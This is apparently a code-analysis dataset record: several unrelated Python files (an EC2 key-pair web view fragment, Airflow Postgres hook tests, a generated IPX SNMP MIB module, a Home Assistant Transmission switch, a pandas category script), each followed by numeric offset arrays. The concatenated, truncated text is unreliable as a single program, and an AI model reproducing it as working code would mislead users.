name = self.request.params.get('name')
location = self.request.route_path('keypair_view', subpath=name)
with boto_error_handler(self.request, location):
self.log_request(_(u"Creating keypair ") + name)
new_keypair = self.conn.create_key_pair(name)
# Store the new keypair material information in the session
self._store_file_(new_keypair.name + ".pem",
'application/x-pem-file;charset=ISO-8859-1',
new_keypair.material)
msg_template = _(u'Successfully created key pair {keypair}')
msg = msg_template.format(keypair=name)
if self.request.is_xhr:
resp_body = json.dumps(dict(message=msg))
return Response(status=200, body=resp_body, content_type='application/x-pem-file;charset=ISO-8859-1')
else:
location = self.request.route_path('keypair_view', subpath=name)
return HTTPFound(location=location)
if self.request.is_xhr:
form_errors = ', '.join(self.keypair_form.get_errors_list())
return JSONResponse(status=400, message=form_errors) # Validation failure = bad request
else:
self.request.error_messages = self.keypair_form.get_errors_list()
return self.render_dict
@view_config(route_name='keypair_import', request_method='POST', renderer=TEMPLATE)
def keypair_import(self):
if self.keypair_form.validate():
name = self.request.params.get('name')
key_material = self.request.params.get('key_material')
# Return to import form if failure
failure_location = self.request.route_path('keypair_view', subpath='new2')
success_location = self.request.route_path('keypair_view', subpath=name)
with boto_error_handler(self.request, failure_location):
self.log_request(_(u"Importing keypair ") + name)
self.conn.import_key_pair(name, key_material)
msg_template = _(u'Successfully imported key pair {keypair}')
msg = msg_template.format(keypair=name)
self.request.session.flash(msg, queue=Notification.SUCCESS)
return HTTPFound(location=success_location)
return self.render_dict
@view_config(route_name='keypair_delete', request_method='POST', renderer=TEMPLATE)
def keypair_delete(self):
if self.delete_form.validate():
keypair_name_param = self.request.params.get('name')
keypair_names = [keypair.strip() for keypair in keypair_name_param.split(',')]
location = self.request.route_path('keypairs')
with boto_error_handler(self.request, location):
for keypair_name in keypair_names:
self.log_request(_(u"Deleting keypair ") + keypair_name)
self.conn.delete_key_pair(keypair_name)
prefix = _(u'Successfully deleted keypair')
if len(keypair_names) == 1:
msg = prefix
else:
msg = u'{0} {1}'.format(prefix, ', '.join(keypair_names))
self.request.session.flash(msg, queue=Notification.SUCCESS)
return HTTPFound(location=location)
return self.render_dict
| [
[
[
1440,
1458
],
[
5114,
5118
],
[
7625,
7629
]
],
[
[
1487,
1502
],
[
6194,
6209
]
],
[
[
1538,
1547
],
[
7895,
7904
],
[
9181,
9190
],
[
10206,
10215
]
],
[
[
1573,
1584
],
[
2235,
2246
],
[
3236,
3247
],
[
6321,
6332
],
[
6686,
6697
],
[
8264,
8275
],
[
9257,
9268
]
],
[
[
1614,
1622
],
[
7678,
7686
]
],
[
[
1653,
1664
],
[
4507,
4518
]
],
[
[
1666,
1683
],
[
4628,
4645
]
],
[
[
1685,
1702
],
[
2120,
2137
],
[
4760,
4777
]
],
[
[
1722,
1723
],
[
2003,
2004
],
[
2655,
2656
],
[
2711,
2712
],
[
4201,
4202
],
[
4266,
4267
],
[
4307,
4308
],
[
4975,
4976
],
[
7062,
7063
],
[
7459,
7460
],
[
8857,
8858
],
[
8983,
8984
],
[
9774,
9775
],
[
9899,
9900
]
],
[
[
1745,
1757
],
[
9140,
9152
],
[
10165,
10177
]
],
[
[
1778,
1786
],
[
3088,
3096
],
[
3914,
3922
],
[
5093,
5101
]
],
[
[
1788,
1803
],
[
1872,
1887
]
],
[
[
1805,
1817
],
[
3402,
3414
],
[
8048,
8060
]
],
[
[
1832,
1850
],
[
3492,
3510
],
[
6508,
6526
],
[
6985,
7003
],
[
8772,
8790
],
[
9642,
9660
]
],
[
[
1859,
1871
],
[
1937,
1949
]
],
[
[
3071,
3087
],
[
3146,
3162
]
],
[
[
3902,
3913
],
[
4064,
4075
]
]
] |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import mock
import unittest
from tempfile import NamedTemporaryFile
import psycopg2.extras
import pytest
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import Connection
class TestPostgresHookConn(unittest.TestCase):
def setUp(self):
super(TestPostgresHookConn, self).setUp()
self.connection = Connection(
login='login',
password='password',
host='host',
schema='schema'
)
class UnitTestPostgresHook(PostgresHook):
conn_name_attr = 'test_conn_id'
self.db_hook = UnitTestPostgresHook()
self.db_hook.get_connection = mock.Mock()
self.db_hook.get_connection.return_value = self.connection
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_non_default_id(self, mock_connect):
self.db_hook.test_conn_id = 'non_default'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='password',
host='host', dbname='schema',
port=None)
self.db_hook.get_connection.assert_called_once_with('non_default')
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn(self, mock_connect):
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='password', host='host',
dbname='schema', port=None)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_cursor(self, mock_connect):
self.connection.extra = '{"cursor": "dictcursor"}'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(cursor_factory=psycopg2.extras.DictCursor,
user='login', password='password', host='host',
dbname='schema', port=None)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
def test_get_conn_with_invalid_cursor(self, mock_connect):
self.connection.extra = '{"cursor": "mycursor"}'
with self.assertRaises(ValueError):
self.db_hook.get_conn()
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
@mock.patch('airflow.contrib.hooks.aws_hook.AwsHook.get_client_type')
def test_get_conn_rds_iam_postgres(self, mock_client, mock_connect):
self.connection.extra = '{"iam":true}'
mock_client.return_value.generate_db_auth_token.return_value = 'aws_token'
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user='login', password='aws_token', host='host',
dbname='schema', port=5432)
@mock.patch('airflow.hooks.postgres_hook.psycopg2.connect')
@mock.patch('airflow.contrib.hooks.aws_hook.AwsHook.get_client_type')
def test_get_conn_rds_iam_redshift(self, mock_client, mock_connect):
self.connection.extra = '{"iam":true, "redshift":true}'
self.connection.host = 'cluster-identifier.ccdfre4hpd39h.us-east-1.redshift.amazonaws.com'
login = 'IAM:{login}'.format(login=self.connection.login)
mock_client.return_value.get_cluster_credentials.return_value = {'DbPassword': 'aws_token',
'DbUser': login}
self.db_hook.get_conn()
mock_connect.assert_called_once_with(user=login, password='aws_token', host=self.connection.host,
dbname='schema', port=5439)
class TestPostgresHook(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestPostgresHook, self).__init__(*args, **kwargs)
self.table = "test_postgres_hook_table"
def setUp(self):
super(TestPostgresHook, self).setUp()
self.cur = mock.MagicMock()
self.conn = conn = mock.MagicMock()
self.conn.cursor.return_value = self.cur
class UnitTestPostgresHook(PostgresHook):
conn_name_attr = 'test_conn_id'
def get_conn(self):
return conn
self.db_hook = UnitTestPostgresHook()
def tearDown(self):
super(TestPostgresHook, self).tearDown()
with PostgresHook().get_conn() as conn:
with conn.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS {}".format(self.table))
@pytest.mark.backend("postgres")
def test_copy_expert(self):
m = mock.mock_open(read_data='{"some": "json"}')
with mock.patch('airflow.hooks.postgres_hook.open', m):
statement = "SQL"
filename = "filename"
self.cur.fetchall.return_value = None
self.assertEqual(None, self.db_hook.copy_expert(statement, filename, open=m))
assert self.conn.close.call_count == 1
assert self.cur.close.call_count == 1
assert self.conn.commit.call_count == 1
self.cur.copy_expert.assert_called_once_with(statement, m.return_value)
self.assertEqual(m.call_args[0], (filename, "r+"))
@pytest.mark.backend("postgres")
def test_bulk_load(self):
hook = PostgresHook()
input_data = ["foo", "bar", "baz"]
with hook.get_conn() as conn:
with conn.cursor() as cur:
cur.execute("CREATE TABLE {} (c VARCHAR)".format(self.table))
conn.commit()
with NamedTemporaryFile() as f:
f.write("\n".join(input_data).encode("utf-8"))
f.flush()
hook.bulk_load(self.table, f.name)
cur.execute("SELECT * FROM {}".format(self.table))
results = [row[0] for row in cur.fetchall()]
self.assertEqual(sorted(input_data), sorted(results))
@pytest.mark.backend("postgres")
def test_bulk_dump(self):
hook = PostgresHook()
input_data = ["foo", "bar", "baz"]
with hook.get_conn() as conn:
with conn.cursor() as cur:
cur.execute("CREATE TABLE {} (c VARCHAR)".format(self.table))
values = ",".join("('{}')".format(data) for data in input_data)
cur.execute("INSERT INTO {} VALUES {}".format(self.table, values))
conn.commit()
with NamedTemporaryFile() as f:
hook.bulk_dump(self.table, f.name)
f.seek(0)
results = [line.rstrip().decode("utf-8") for line in f.readlines()]
self.assertEqual(sorted(input_data), sorted(results))
| [
[
[
821,
825
],
[
1561,
1565
],
[
2052,
2056
],
[
2358,
2362
],
[
2818,
2822
],
[
3083,
3087
],
[
3147,
3151
],
[
3624,
3628
],
[
3688,
3692
],
[
1476,
1480
],
[
4747,
4751
],
[
4791,
4795
],
[
5378,
5382
],
[
5436,
5440
]
],
[
[
833,
841
],
[
1042,
1050
],
[
4485,
4493
]
],
[
[
864,
882
],
[
6343,
6361
],
[
7226,
7244
]
],
[
[
891,
906
],
[
2618,
2626
]
],
[
[
914,
920
],
[
5302,
5308
],
[
6000,
6006
],
[
6720,
6726
]
],
[
[
962,
974
],
[
1332,
1344
],
[
4893,
4905
],
[
5148,
5160
],
[
6077,
6089
],
[
6797,
6809
]
],
[
[
1002,
1012
],
[
1161,
1171
]
],
[
[
1021,
1041
],
[
1098,
1118
]
],
[
[
4468,
4484
],
[
4561,
4577
],
[
4695,
4711
],
[
5099,
5115
]
]
] |
from .idw import inverse_distance_weighting
| [
[
[
17,
43
]
]
] |
#
# PySNMP MIB module IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:56:57 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
cjnMgmt, = mibBuilder.importSymbols("Cajun-ROOT", "cjnMgmt")
NetNumber, = mibBuilder.importSymbols("IPX-PRIVATE-MIB", "NetNumber")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter32, Bits, Unsigned32, Gauge32, IpAddress, ObjectIdentity, Integer32, NotificationType, MibIdentifier, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Counter64, iso = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "Bits", "Unsigned32", "Gauge32", "IpAddress", "ObjectIdentity", "Integer32", "NotificationType", "MibIdentifier", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Counter64", "iso")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
cjnIpxIfMgmt = ModuleIdentity((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2))
if mibBuilder.loadTexts: cjnIpxIfMgmt.setLastUpdated('9904010000Z')
if mibBuilder.loadTexts: cjnIpxIfMgmt.setOrganization("Lucent's Concord Technology Center (CTC)")
if mibBuilder.loadTexts: cjnIpxIfMgmt.setContactInfo('Marc Cochran -- mcochran@lucent.com')
if mibBuilder.loadTexts: cjnIpxIfMgmt.setDescription('Cajun Private IPX Interface Management MIB')
cjnIpxIfGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1))
cjnIpxIfNextIndex = MibScalar((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfNextIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNextIndex.setDescription('The next available IfIndex. This number should be used to create new rows in the IpxIfTable.')
cjnIpxIfNumber = MibScalar((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfNumber.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNumber.setDescription('The number of IPX interfaces.')
cjnIpxIfTable = MibTable((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3), )
if mibBuilder.loadTexts: cjnIpxIfTable.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfTable.setDescription('A list of Cajun IPX interface entries. The number of entries is given by the value of cjnIpxIfNumber.')
cjnIpxIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1), ).setIndexNames((0, "IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB", "cjnIpxIfIndex"))
if mibBuilder.loadTexts: cjnIpxIfEntry.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfEntry.setDescription('A Cajun IPX interface instance.')
cjnIpxIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfIndex.setDescription("The globally unique identifier for this interface. This number MUST correlate with the IfTable's IfIndex in MIB-II or RFC2233.")
cjnIpxIfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfRowStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfRowStatus.setDescription('The status of this row, by which new entries may be created, or old entries deleted from this table.')
cjnIpxIfNetNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 3), NetNumber()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfNetNumber.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfNetNumber.setDescription('The IPX network number associated with this IPX interface.')
cjnIpxIfEncapsType = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ethernetV2", 1), ("ethernet8022", 2), ("ethernetSNAP", 3), ("ethernet8023", 4))).clone('ethernetV2')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfEncapsType.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfEncapsType.setDescription('The Ethernet encapsulation type used on this IPX interface.')
cjnIpxIfVlanIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 5), Integer32()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfVlanIfIndex.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfVlanIfIndex.setDescription("The interface index of the VLAN for this interface. This number MUST correlate with the IfTable's IfIndex in MIB-II or RFC2233.")
cjnIpxIfName = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 31))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfName.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfName.setDescription('The protocol unique name associated with this interface. This name is limited to 31 characters and may appear in other protocol interface entries such as IP and Appletalk but MAY NOT be duplicated within the cjnIpxIfTable. In other words, other protocols can use this interface name but IPX may only have this name associated with one interface.')
cjnIpxIfTicks = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 7), Integer32().clone(1)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfTicks.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfTicks.setDescription('The period of time, in ticks, that it takes to transmit one byte of data, excluding protocol headers, to a destination on the other end of the circuit, if the circuit is free of other traffic.')
cjnIpxIfType20RbcastMode = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("disabled", 1), ("inbound", 2), ("outbound", 3), ("both", 4))).clone('disabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfType20RbcastMode.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfType20RbcastMode.setDescription('The handling of NetBIOS Type 20 packets on the interface. If set to disabled(1), Type 20 packets are neither sent nor received on the interface. If set to inbound(2), Type 20 packets may be received but not sent. If set to outbound(3), Type 20 packets may be sent on the interface but not received. If set to both(4), Type 20 packets may be sent and received.')
cjnIpxIfAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("testing", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cjnIpxIfAdminStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfAdminStatus.setDescription('The administrative state of this interface. The testing(3) state indicates that no operational packets can be passed. When a managed system initializes, all interfaces start with ifAdminStatus in the down(2) state. As a result of either explicit management action or per configuration information retained by the managed system, ifAdminStatus is then changed to either the up(1) or testing(3) states (or remains in the down(2) state).')
cjnIpxIfOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 1751, 2, 43, 3, 2, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("testing", 3), ("lowerLayerDown", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cjnIpxIfOperStatus.setStatus('current')
if mibBuilder.loadTexts: cjnIpxIfOperStatus.setDescription('The current operational state of this interface. The testing(3) state indicates that no operational packets can be passed. If cjnIpxIfAdminStatus is down(2) then cjnIpxIfOperStatus should be down(2). If cjnIpxIfAdminStatus is up(1) then cjnIpxIfOperStatus should change to up(1) if the interface is ready to transmit and receive network traffic; it should change to lowerLayerDown(4) if the interface is waiting for external actions (such as a port on the VLAN associated with the interface becoming operational).')
mibBuilder.exportSymbols("IPX-INTERFACE-MANAGEMENT-PRIVATE-MIB", cjnIpxIfNextIndex=cjnIpxIfNextIndex, cjnIpxIfTable=cjnIpxIfTable, cjnIpxIfAdminStatus=cjnIpxIfAdminStatus, cjnIpxIfMgmt=cjnIpxIfMgmt, cjnIpxIfEncapsType=cjnIpxIfEncapsType, cjnIpxIfName=cjnIpxIfName, cjnIpxIfNetNumber=cjnIpxIfNetNumber, cjnIpxIfRowStatus=cjnIpxIfRowStatus, cjnIpxIfTicks=cjnIpxIfTicks, cjnIpxIfVlanIfIndex=cjnIpxIfVlanIfIndex, cjnIpxIfType20RbcastMode=cjnIpxIfType20RbcastMode, cjnIpxIfGroup=cjnIpxIfGroup, cjnIpxIfOperStatus=cjnIpxIfOperStatus, cjnIpxIfIndex=cjnIpxIfIndex, cjnIpxIfEntry=cjnIpxIfEntry, PYSNMP_MODULE_ID=cjnIpxIfMgmt, cjnIpxIfNumber=cjnIpxIfNumber)
| [
[
[
382,
393
]
],
[
[
395,
411
]
],
[
[
413,
420
]
],
[
[
502,
513
],
[
4611,
4622
],
[
6597,
6608
],
[
7406,
7417
],
[
8242,
8253
]
],
[
[
577,
593
],
[
4540,
4556
],
[
6526,
6542
],
[
7338,
7354
],
[
8171,
8187
]
],
[
[
595,
616
],
[
4557,
4578
],
[
6543,
6564
],
[
7355,
7376
],
[
8188,
8209
]
],
[
[
618,
637
],
[
5443,
5462
]
],
[
[
639,
662
]
],
[
[
664,
684
]
],
[
[
850,
857
]
],
[
[
911,
920
],
[
4197,
4206
]
],
[
[
981,
998
]
],
[
[
1000,
1016
]
],
[
[
1100,
1109
]
],
[
[
1111,
1115
]
],
[
[
1117,
1127
]
],
[
[
1129,
1136
]
],
[
[
1138,
1147
]
],
[
[
1149,
1163
]
],
[
[
1165,
1174
],
[
2286,
2295
],
[
2614,
2623
],
[
3477,
3486
],
[
4508,
4517
],
[
5029,
5038
],
[
6042,
6051
],
[
6494,
6503
],
[
7306,
7315
],
[
8139,
8148
]
],
[
[
1176,
1192
]
],
[
[
1194,
1207
],
[
2155,
2168
]
],
[
[
1209,
1218
]
],
[
[
1220,
1229
],
[
2231,
2240
],
[
2559,
2568
]
],
[
[
1231,
1239
],
[
2817,
2825
]
],
[
[
1241,
1252
],
[
3108,
3119
]
],
[
[
1254,
1268
],
[
3411,
3425
],
[
3779,
3793
],
[
4131,
4145
],
[
4442,
4456
],
[
4963,
4977
],
[
5341,
5355
],
[
5976,
5990
],
[
6428,
6442
],
[
7240,
7254
],
[
8072,
8086
]
],
[
[
1270,
1284
],
[
1728,
1742
]
],
[
[
1286,
1295
]
],
[
[
1297,
1300
]
],
[
[
1578,
1591
],
[
5407,
5420
]
],
[
[
1593,
1602
],
[
3845,
3854
]
],
[
[
1604,
1621
]
],
[
[
1713,
1725
],
[
1807,
1819
],
[
1875,
1887
],
[
1973,
1985
],
[
2065,
2077
],
[
9170,
9182
],
[
9588,
9600
]
],
[
[
2139,
2152
],
[
9459,
9472
]
],
[
[
2211,
2228
],
[
2349,
2366
],
[
2413,
2430
],
[
9068,
9085
]
],
[
[
2542,
2556
],
[
2677,
2691
],
[
2738,
2752
],
[
9617,
9631
]
],
[
[
2801,
2814
],
[
2898,
2911
],
[
2958,
2971
],
[
9101,
9114
]
],
[
[
3092,
3105
],
[
3271,
3284
],
[
3331,
3344
],
[
9556,
9569
]
],
[
[
3395,
3408
],
[
3540,
3553
],
[
3600,
3613
],
[
9527,
9540
]
],
[
[
3759,
3776
],
[
3910,
3927
],
[
3974,
3991
],
[
9305,
9322
]
],
[
[
4111,
4128
],
[
4262,
4279
],
[
4326,
4343
],
[
9268,
9285
]
],
[
[
4421,
4439
],
[
4779,
4797
],
[
4844,
4862
],
[
9203,
9221
]
],
[
[
4941,
4960
],
[
5094,
5113
],
[
5160,
5179
],
[
9373,
9392
]
],
[
[
5326,
5338
],
[
5524,
5536
],
[
5583,
5595
],
[
9236,
9248
]
],
[
[
5960,
5973
],
[
6116,
6129
],
[
6176,
6189
],
[
9338,
9351
]
],
[
[
6401,
6425
],
[
6744,
6768
],
[
6815,
6839
],
[
9419,
9443
]
],
[
[
7218,
7237
],
[
7512,
7531
],
[
7578,
7597
],
[
9136,
9155
]
],
[
[
8051,
8069
],
[
8369,
8387
],
[
8434,
8452
],
[
9493,
9511
]
]
] |
"""Support for setting the Transmission BitTorrent client Turtle Mode."""
import logging
from homeassistant.const import CONF_NAME, STATE_OFF, STATE_ON
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import ToggleEntity
from .const import DOMAIN, SWITCH_TYPES
_LOGGING = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Transmission switch."""
tm_client = hass.data[DOMAIN][config_entry.entry_id]
name = config_entry.data[CONF_NAME]
dev = []
for switch_type, switch_name in SWITCH_TYPES.items():
dev.append(TransmissionSwitch(switch_type, switch_name, tm_client, name))
async_add_entities(dev, True)
class TransmissionSwitch(ToggleEntity):
"""Representation of a Transmission switch."""
def __init__(self, switch_type, switch_name, tm_client, name):
"""Initialize the Transmission switch."""
self._name = switch_name
self.client_name = name
self.type = switch_type
self._tm_client = tm_client
self._state = STATE_OFF
self._data = None
self.unsub_update = None
@property
def name(self):
"""Return the name of the switch."""
return f"{self.client_name} {self._name}"
@property
def unique_id(self):
"""Return the unique id of the entity."""
return f"{self._tm_client.api.host}-{self.name}"
@property
def should_poll(self):
"""Poll for status regularly."""
return False
@property
def is_on(self):
"""Return true if device is on."""
return self._state == STATE_ON
@property
def available(self):
"""Could the device be accessed during the last update call."""
return self._tm_client.api.available
def turn_on(self, **kwargs):
"""Turn the device on."""
if self.type == "on_off":
_LOGGING.debug("Starting all torrents")
self._tm_client.api.start_torrents()
elif self.type == "turtle_mode":
_LOGGING.debug("Turning Turtle Mode of Transmission on")
self._tm_client.api.set_alt_speed_enabled(True)
self._tm_client.api.update()
def turn_off(self, **kwargs):
"""Turn the device off."""
if self.type == "on_off":
_LOGGING.debug("Stopping all torrents")
self._tm_client.api.stop_torrents()
if self.type == "turtle_mode":
_LOGGING.debug("Turning Turtle Mode of Transmission off")
self._tm_client.api.set_alt_speed_enabled(False)
self._tm_client.api.update()
async def async_added_to_hass(self):
"""Handle entity which will be added."""
self.unsub_update = async_dispatcher_connect(
self.hass,
self._tm_client.api.signal_update,
self._schedule_immediate_update,
)
@callback
def _schedule_immediate_update(self):
self.async_schedule_update_ha_state(True)
async def will_remove_from_hass(self):
"""Unsubscribe from update dispatcher."""
if self.unsub_update:
self.unsub_update()
self.unsub_update = None
def update(self):
"""Get the latest data from Transmission and updates the state."""
active = None
if self.type == "on_off":
self._data = self._tm_client.api.data
if self._data:
active = self._data.activeTorrentCount > 0
elif self.type == "turtle_mode":
active = self._tm_client.api.get_alt_speed_enabled()
if active is None:
return
self._state = STATE_ON if active else STATE_OFF
| [
[
[
81,
88
],
[
370,
377
]
],
[
[
122,
131
],
[
598,
607
]
],
[
[
133,
142
],
[
1164,
1173
],
[
3771,
3780
]
],
[
[
144,
152
],
[
1723,
1731
],
[
3747,
3755
]
],
[
[
184,
192
],
[
2986,
2994
]
],
[
[
238,
262
],
[
2829,
2853
]
],
[
[
304,
316
],
[
825,
837
]
],
[
[
337,
343
],
[
538,
544
]
],
[
[
345,
357
],
[
659,
671
]
],
[
[
359,
367
],
[
2003,
2011
],
[
2145,
2153
],
[
2415,
2423
],
[
2554,
2562
]
],
[
[
400,
797
]
],
[
[
806,
824
],
[
700,
718
]
]
] |
import csv
import time
import os
import pandas as pd
DATA_ROOT = "C:\\RS\\Amazon\\All\\"
MINIMUM_X_CATEGORIES_FILENAME = 'minimum_2_Categories.csv'
timestamp = time.strftime('%y%m%d%H%M%S')
out_filename = os.path.join(DATA_ROOT, timestamp + 'categories_permutations.csv')
with open(out_filename, 'w', newline='', encoding='utf8') as sum_f:
writer = csv.writer(sum_f, delimiter=',', lineterminator='\n')
entire_data = pd.read_csv(os.path.join(DATA_ROOT, MINIMUM_X_CATEGORIES_FILENAME))
categories = entire_data.columns
row = ['idx_cat_a', 'cat_a', 'idx_cat_b', 'cat_b', 'user_count', 'item_count_a', 'item_count_b', 'item_both']
writer.writerow(row)
for idx_cat_a, cat_a in enumerate(categories):
if idx_cat_a == 0:
continue
for idx_cat_b, cat_b in enumerate(categories):
if idx_cat_b <= idx_cat_a:
continue
# print(idx_cat_a, cat_a, idx_cat_b, cat_b)
# user_count_a = entire_data[cat_a].astype(bool).sum()
# user_count_b = entire_data[cat_b].astype(bool).sum()
user_count = entire_data.loc[entire_data[cat_b] != 0, cat_a].astype(bool).sum()
# item_count_a = entire_data[cat_a].sum()
# item_count_b = entire_data[cat_b].sum()
item_count_a = entire_data.loc[(entire_data[cat_a] != 0) & (entire_data[cat_b] != 0), cat_a].sum()
item_count_b = entire_data.loc[(entire_data[cat_a] != 0) & (entire_data[cat_b] != 0), cat_b].sum()
item_both = item_count_a + item_count_b
row = [idx_cat_a, cat_a, idx_cat_b, cat_b,user_count, item_count_a, item_count_b, item_both]
writer.writerow(row)
| [
[
[
8,
11
],
[
357,
360
]
],
[
[
19,
23
],
[
164,
168
]
],
[
[
31,
33
],
[
209,
211
],
[
441,
443
]
],
[
[
42,
54
],
[
429,
431
]
],
[
[
56,
65
],
[
222,
231
],
[
454,
463
]
],
[
[
92,
121
],
[
465,
494
]
],
[
[
152,
161
],
[
233,
242
]
],
[
[
194,
206
],
[
286,
298
]
],
[
[
337,
342
],
[
368,
373
]
],
[
[
348,
354
],
[
652,
658
],
[
1673,
1679
]
],
[
[
415,
426
],
[
514,
525
],
[
1106,
1117
],
[
1122,
1133
],
[
1308,
1319
],
[
1325,
1336
],
[
1353,
1364
],
[
1419,
1430
],
[
1436,
1447
],
[
1464,
1475
]
],
[
[
501,
511
],
[
711,
721
],
[
814,
824
]
],
[
[
538,
541
],
[
668,
671
]
],
[
[
681,
690
],
[
735,
744
],
[
855,
864
],
[
1575,
1584
]
],
[
[
692,
697
],
[
1147,
1152
],
[
1337,
1342
],
[
1379,
1384
],
[
1448,
1453
],
[
1586,
1591
]
],
[
[
784,
793
],
[
842,
851
],
[
1593,
1602
]
],
[
[
795,
800
],
[
1134,
1139
],
[
1365,
1370
],
[
1476,
1481
],
[
1490,
1495
],
[
1604,
1609
]
],
[
[
1093,
1103
],
[
1610,
1620
]
],
[
[
1293,
1305
],
[
1527,
